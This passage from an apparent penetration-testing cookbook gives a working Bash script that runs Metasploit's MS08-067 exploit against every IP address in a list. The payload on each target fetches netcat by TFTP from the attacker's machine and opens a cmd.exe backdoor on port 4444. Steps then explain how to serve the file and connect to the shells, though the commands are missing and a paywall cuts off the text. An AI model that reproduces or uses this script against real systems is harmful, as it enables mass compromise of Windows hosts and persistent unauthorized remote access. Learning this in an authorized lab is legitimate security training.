How to do it...

The example that follows demonstrates how a Bash script can be used to exploit multiple instances of a single vulnerability simultaneously. This script in particular can be used to exploit multiple instances of the MS08-067 NetAPI vulnerability by referencing an input 
list of IP addresses:

#!/bin/bash

if [ ! $1 ]; then echo "Usage: #./script <host file>"; exit; fi

iplist=$1

i=4444
for ip in $(cat $iplist)
do
  gnome-terminal -x msfconsole -x 
  "use exploit/windows/smb/ms08_067_netapi; set PAYLOAD windows/exec;
   set RHOST $ip; set CMD cmd.exe /c tftp -i 172.16.69.133 GET nc.exe
   && nc.exe -lvp 4444 -e cmd.exe; run"
   echo "Exploiting $ip and creating backdoor on TCP port 4444"
i=$(($i+1))
done
  1. This script is different from the one discussed in the previous recipe because this script installs a backdoor on each target. On each exploited system, a payload is executed that uses the integrated Trivial File Transfer Protocol (TFTP) client to grab the Netcat executable and then uses it to open up a listening cmd.exe terminal service on the TCP port 4444.
  2. For this to work, a TFTP service will need to be running on the Kali system. This can be done by issuing the following commands:
  1. The first command starts the TFTP service on UDP port 69 with the service directory in /tmp. The second command is used to copy the Netcat executable from the Windows binaries folder to the TFTP directory.
  2. Now, we execute the ./multipwn.sh Bash shell:
  1. If the script is executed without supplying any arguments, the script will output the appropriate usage. This usage description will indicate that the script should be executed with an argument specifying the filename for a text file containing a list of target IP addresses.
  2. Once executed with this argument, a series of new terminals will begin popping up. Each of these terminals will run the exploitation sequence of one of the IP addresses in the input list.
  3. The original execution terminal will output a list of processes as they are executed and indicate that a backdoor will be created on each terminal.
  1. After the exploitation sequence has completed in each terminal, Netcat can be used to connect to the remote service that was opened by the payload:
  1. In the example provided, connecting to TCP port 4444 on the successfully exploited system with IP address 172.16.69.140 yields remote access to a cmd.exe terminal service.
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset